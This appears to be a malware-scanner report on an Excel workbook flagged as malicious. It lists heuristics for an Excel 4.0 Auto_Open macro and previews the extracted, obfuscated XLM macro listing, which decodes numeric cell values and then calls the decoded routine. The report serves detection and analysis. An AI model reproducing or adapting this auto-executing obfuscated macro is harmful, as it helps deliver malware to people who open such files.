MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6813 bytes |
SHA-256: c0436a0da9e3a4094694613e497172d6459a34df466013e28c3ffe97d0a28903 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - RjDrqBMWQ
' 0018 24 LABEL : Cell Value, String Constant - AEliBseHG len=0
' 0018 22 LABEL : Cell Value, String Constant - AJEqjwY len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!H161
' 0018 25 LABEL : Cell Value, String Constant - ctcscpSIho len=0
' 0018 21 LABEL : Cell Value, String Constant - dIvdWv len=0
' 0018 20 LABEL : Cell Value, String Constant - eTZgk len=0
' 0018 21 LABEL : Cell Value, String Constant - fHODsY len=0
' 0018 21 LABEL : Cell Value, String Constant - HBZpLS len=0
' 0018 26 LABEL : Cell Value, String Constant - hwPkbYIpYzB len=0
' 0018 26 LABEL : Cell Value, String Constant - ILJvjVfEWQg len=0
' 0018 25 LABEL : Cell Value, String Constant - jgHxTWutgc len=0
' 0018 24 LABEL : Cell Value, String Constant - kjSkIUhXK len=0
' 0018 22 LABEL : Cell Value, String Constant - LfQMIbU len=0
' 0018 22 LABEL : Cell Value, String Constant - ntxfwwA len=0
' 0018 20 LABEL : Cell Value, String Constant - PXqQs len=0
' 0018 22 LABEL : Cell Value, String Constant - SMGEnpe len=0
' 0018 24 LABEL : Cell Value, String Constant - thfcvKzqs len=0
' 0018 21 LABEL : Cell Value, String Constant - THjjjn len=0
' 0018 20 LABEL : Cell Value, String Constant - uZbkY len=0
' 0018 26 LABEL : Cell Value, String Constant - vztVVOXzkhP len=0
' 0018 24 LABEL : Cell Value, String Constant - ygWHxiDtP len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' RjDrqBMWQ,T45,"",980.00000000000000000000
' RjDrqBMWQ,T46,"",859.00000000000000000000
' RjDrqBMWQ,T47,"",-610.00000000000000000000
' RjDrqBMWQ,T48,"",-689.00000000000000000000
' RjDrqBMWQ,T49,"",-150.00000000000000000000
' RjDrqBMWQ,T50,"",388.00000000000000000000
' RjDrqBMWQ,H79,"SET.NAME("jgHxTWutgc",0+VALUE("0"))",""
' RjDrqBMWQ,H82,"SET.NAME("LfQMIbU",jgHxTWutgc)",""
' RjDrqBMWQ,H85,"SET.NAME("HBZpLS",jgHxTWutgc)",""
' RjDrqBMWQ,H89,"SET.NAME("uZbkY",COUNTA(AEliBseHG))",""
' RjDrqBMWQ,H91,"SET.NAME("ILJvjVfEWQg",COUNTA(dIvdWv))",""
' RjDrqBMWQ,H93,[],""
' RjDrqBMWQ,H96,"SET.NAME("eTZgk","")",""
' RjDrqBMWQ,H99,"LfQMIbU",""
' RjDrqBMWQ,H104,"SET.NAME("ctcscpSIho",HLOOKUP("*",AEliBseHG,LfQMIbU,FALSE))",""
' RjDrqBMWQ,H106,"fHODsY",""
' RjDrqBMWQ,H108,"SET.NAME("kjSkIUhXK",jgHxTWutgc)",""
' RjDrqBMWQ,H113,[],""
' RjDrqBMWQ,H118,"kjSkIUhXK",""
' RjDrqBMWQ,H122,"ygWHxiDtP",""
' RjDrqBMWQ,H125,"AJEqjwY",""
' RjDrqBMWQ,H130,"SMGEnpe",""
' RjDrqBMWQ,H132,"SET.NAME("PXqQs",VALUE(HLOOKUP("*",dIvdWv,SMGEnpe,FALSE)))",""
' RjDrqBMWQ,H136,"THjjjn",""
' RjDrqBMWQ,H140,"eTZgk",""
' RjDrqBMWQ,H143,"HBZpLS",""
' RjDrqBMWQ,H145,NEXT(),""
' RjDrqBMWQ,H147,"thfcvKzqs",""
' RjDrqBMWQ,H150,[],""
' RjDrqBMWQ,H153,"ntxfwwA",""
' RjDrqBMWQ,H157,NEXT(),""
' RjDrqBMWQ,H159,RETURN(),""
' RjDrqBMWQ,H188,"SET.NAME("hwPkbYIpYzB",H79)",""
' RjDrqBMWQ,H190,"AEliBseHG",""
' RjDrqBMWQ,H195,"SET.NAME("dIvdWv",R93C11)",""
' RjDrqBMWQ,H200,"SET.NAME("ntxfwwA",205)",""
' RjDrqBMWQ,H202,"SET.NAME("vztVVOXzkhP",8)",""
' RjDrqBMWQ,H204,hwPkbYIpYzB(),""
' RjDrqBMWQ,H205,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.